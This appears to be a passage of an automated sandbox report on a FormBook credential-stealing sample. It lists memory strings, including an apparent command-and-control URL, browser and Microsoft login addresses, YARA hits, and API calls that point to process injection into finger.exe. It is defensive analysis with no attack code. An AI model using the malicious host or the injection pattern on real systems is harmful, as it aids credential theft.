Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:47:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: QmBbqpEHu0.exe, 00000000.00000002.3592498546.0000000002941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: cqvjCApYGBKzop.exe, 0000000B.00000002.3587260572.000000000146C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.comect.online
                Source: cqvjCApYGBKzop.exe, 0000000B.00000002.3587260572.000000000146C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.comect.online/hmf8/
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Source
                Source: finger.exe, 0000000A.00000002.3586685335.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: finger.exe, 0000000A.00000002.3586685335.0000000000E5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: finger.exe, 0000000A.00000002.3586685335.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: finger.exe, 0000000A.00000002.3586685335.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: finger.exe, 0000000A.00000002.3586685335.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: finger.exe, 0000000A.00000002.3586685335.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: finger.exe, 0000000A.00000003.2474010966.0000000007C71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://nl.trustpilot.com/review/www.transip.nl
                Source: cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.eu/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.eu/cp/
                Source: cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.nl/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.nl/cp/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://trustpilot.com/review/www.transip.nl
                Source: finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/knowledgebase/entry/284-start-sending-receiving-email-domain/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/knowledgebase/entry/5885/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/knowledgebase/zoeken/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/privacy-policy/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/question/100000230
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/question/110000577/
                Source: cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/services/search-domains/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/terms-of-service/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/algemene-voorwaarden/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/knowledgebase/zoeken/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/privacy-policy/
                Source: cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/services/search-domains/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000534/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000572
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000580/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/198/

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.QmBbqpEHu0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.QmBbqpEHu0.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2286467492.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3587418424.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3587551333.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3587562902.00000000045B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2286547549.0000000002840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0042CD93 NtClose,4_2_0042CD93
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002B60 NtClose,LdrInitializeThunk,4_2_01002B60
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01002DF0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01002C70
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010035C0 NtCreateMutant,LdrInitializeThunk,4_2_010035C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01004340 NtSetContextThread,4_2_01004340
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01004650 NtSuspendThread,4_2_01004650
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002B80 NtQueryInformationFile,4_2_01002B80
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002BA0 NtEnumerateValueKey,4_2_01002BA0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002BE0 NtQueryValueKey,4_2_01002BE0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002BF0 NtAllocateVirtualMemory,4_2_01002BF0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002AB0 NtWaitForSingleObject,4_2_01002AB0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002AD0 NtReadFile,4_2_01002AD0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002AF0 NtWriteFile,4_2_01002AF0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002D00 NtSetInformationFile,4_2_01002D00
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002D10 NtMapViewOfSection,4_2_01002D10
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002D30 NtUnmapViewOfSection,4_2_01002D30
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002DB0 NtEnumerateKey,4_2_01002DB0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002DD0 NtDelayExecution,4_2_01002DD0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002C00 NtQueryInformationProcess,4_2_01002C00
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002C60 NtCreateKey,4_2_01002C60
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002CA0 NtQueryInformationToken,4_2_01002CA0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002CC0 NtQueryVirtualMemory,4_2_01002CC0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002CF0 NtOpenProcess,4_2_01002CF0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002F30 NtCreateSection,4_2_01002F30
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002F60 NtCreateProcessEx,4_2_01002F60
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002F90 NtProtectVirtualMemory,4_2_01002F90
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002FA0 NtQuerySection,4_2_01002FA0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002FB0 NtResumeThread,4_2_01002FB0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002FE0 NtCreateFile,4_2_01002FE0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002E30 NtWriteVirtualMemory,4_2_01002E30
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002E80 NtReadVirtualMemory,4_2_01002E80
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002EA0 NtAdjustPrivilegesToken,4_2_01002EA0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002EE0 NtQueueApcThread,4_2_01002EE0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01003010 NtOpenDirectoryObject,4_2_01003010
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01003090 NtSetValueKey,4_2_01003090
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010039B0 NtGetContextThread,4_2_010039B0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01003D10 NtOpenProcessToken,4_2_01003D10
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01003D70 NtOpenThread,4_2_01003D70
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03524340 NtSetContextThread,LdrInitializeThunk,10_2_03524340
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03524650 NtSuspendThread,LdrInitializeThunk,10_2_03524650
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522B60 NtClose,LdrInitializeThunk,10_2_03522B60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522BF0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_03522BF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522BE0 NtQueryValueKey,LdrInitializeThunk,10_2_03522BE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522BA0 NtEnumerateValueKey,LdrInitializeThunk,10_2_03522BA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522AD0 NtReadFile,LdrInitializeThunk,10_2_03522AD0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522AF0 NtWriteFile,LdrInitializeThunk,10_2_03522AF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522F30 NtCreateSection,LdrInitializeThunk,10_2_03522F30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522FE0 NtCreateFile,LdrInitializeThunk,10_2_03522FE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522FB0 NtResumeThread,LdrInitializeThunk,10_2_03522FB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522EE0 NtQueueApcThread,LdrInitializeThunk,10_2_03522EE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522E80 NtReadVirtualMemory,LdrInitializeThunk,10_2_03522E80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522D10 NtMapViewOfSection,LdrInitializeThunk,10_2_03522D10
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522D30 NtUnmapViewOfSection,LdrInitializeThunk,10_2_03522D30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522DD0 NtDelayExecution,LdrInitializeThunk,10_2_03522DD0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_03522DF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_03522C70
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522C60 NtCreateKey,LdrInitializeThunk,10_2_03522C60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522CA0 NtQueryInformationToken,LdrInitializeThunk,10_2_03522CA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035235C0 NtCreateMutant,LdrInitializeThunk,10_2_035235C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035239B0 NtGetContextThread,LdrInitializeThunk,10_2_035239B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522B80 NtQueryInformationFile,10_2_03522B80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522AB0 NtWaitForSingleObject,10_2_03522AB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522F60 NtCreateProcessEx,10_2_03522F60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522F90 NtProtectVirtualMemory,10_2_03522F90
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522FA0 NtQuerySection,10_2_03522FA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522E30 NtWriteVirtualMemory,10_2_03522E30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522EA0 NtAdjustPrivilegesToken,10_2_03522EA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522D00 NtSetInformationFile,10_2_03522D00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522DB0 NtEnumerateKey,10_2_03522DB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522C00 NtQueryInformationProcess,10_2_03522C00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522CC0 NtQueryVirtualMemory,10_2_03522CC0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522CF0 NtOpenProcess,10_2_03522CF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03523010 NtOpenDirectoryObject,10_2_03523010
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03523090 NtSetValueKey,10_2_03523090
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03523D70 NtOpenThread,10_2_03523D70
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03523D10 NtOpenProcessToken,10_2_03523D10
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_009C95F0 NtCreateFile,10_2_009C95F0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_009C9760 NtReadFile,10_2_009C9760
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_009C98F0 NtClose,10_2_009C98F0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_009C9850 NtDeleteFile,10_2_009C9850
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_009C9A60 NtAllocateVirtualMemory,10_2_009C9A60
